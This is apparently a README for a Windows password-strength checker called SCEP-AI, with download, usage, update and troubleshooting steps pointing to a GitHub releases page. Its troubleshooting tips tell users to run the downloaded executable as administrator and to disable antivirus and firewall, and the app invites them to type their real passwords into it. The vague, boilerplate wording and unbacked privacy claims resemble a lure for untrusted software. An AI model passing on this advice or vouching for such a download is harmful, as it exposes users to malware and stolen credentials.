SCEP-AI is an easy-to-use app that checks how strong your password is. It uses artificial intelligence to analyze your password’s strength and tells you if it is secure. The app focuses on password entropy. Entropy is a measure of how unpredictable your password is. The more entropy, the harder it is for someone to guess or crack your password.
This app helps you create better passwords. It works on Windows computers and does not need complicated settings. You just run the app and type in a password to check its safety.
Before you start, make sure your computer meets these basic needs:
- Windows 10 or later
- At least 2 GB of free memory (RAM)
- 100 MB of free disk space for the app and temporary files
- Internet connection is optional but recommended for updates
No special hardware or software is needed. If your computer runs Windows and has basic specs, you should be able to use SCEP-AI without issues.
To get the app, visit the official GitHub page.
Click the link above or below to go to the download page:
https://github.com/Mkar9182/SCEP-AI
This page contains the latest version of the app. You will find links to download the program file there.
Follow these steps to download and run SCEP-AI on your Windows computer:
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Open your web browser and go to:
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Find the download section on the page. Look for “Releases” or a link named something like “Download” or “Assets.”
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Download the latest Windows setup file. This will usually be an
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Once the download finishes, open the file in your downloads folder. You may see a security prompt from Windows. If so, click “Run.”
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Follow the on-screen instructions to install SCEP-AI. You can keep the default options. No extra software is required.
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After installation, find SCEP-AI in your Start menu or on your desktop.
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Double-click the icon to open the app.
After you open the app, you will see a simple window with a place to type your password. Here is how to use it:
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Enter your password in the box provided. You can type any password you want to check.
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Click the “Check” or “Analyze” button.
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The app will quickly show you a score or a message about your password’s strength. This score is based on entropy and other factors.
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If the password is weak, the app may give suggestions to make it stronger. For example:
- Add uppercase letters
- Add numbers or special characters
- Make the password longer
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Try new passwords until you find one that scores high on strength.
SCEP-AI does not store your password anywhere. It only checks it inside the app to protect your privacy.
To keep SCEP-AI working well, check for updates regularly:
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Visit the GitHub page: https://github.com/Mkar9182/SCEP-AI
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Look for new release versions under the “Releases” tab.
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Download the latest installer file if a new version is available.
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Install the update the same way you installed the original app.
You can uninstall the old version before installing a new one, but it is not necessary.
If you have trouble running or installing SCEP-AI, try these tips:
- Make sure your Windows is up to date. Use Windows Update to install necessary fixes.
- If the app does not start, right-click the icon and select “Run as administrator.”
- Disable any antivirus or firewall temporarily, as it may block the app’s launch. Re-enable it after testing.
- Re-download the installer in case the original file was incomplete or corrupted.
- For any unexpected errors, restart your computer and try again.
If problems continue, you can check the GitHub page for help or open an issue.
SCEP-AI processes your passwords locally on your computer. It does not send your password data anywhere. This means your passwords stay private.
The app uses AI to estimate password strength, which gives a more accurate result than simple checks. It helps you understand how hard it is for attackers to guess your password.
- Fast password entropy calculation
- Clear strength score and feedback
- Works offline with no internet required
- Lightweight and easy to install
- Simple interface for any user
- Open-source code for transparency
All information about updates, changes, and support is available on the repository page:
https://github.com/Mkar9182/SCEP-AI
Check the “README” and “Issues” sections for the latest news and help.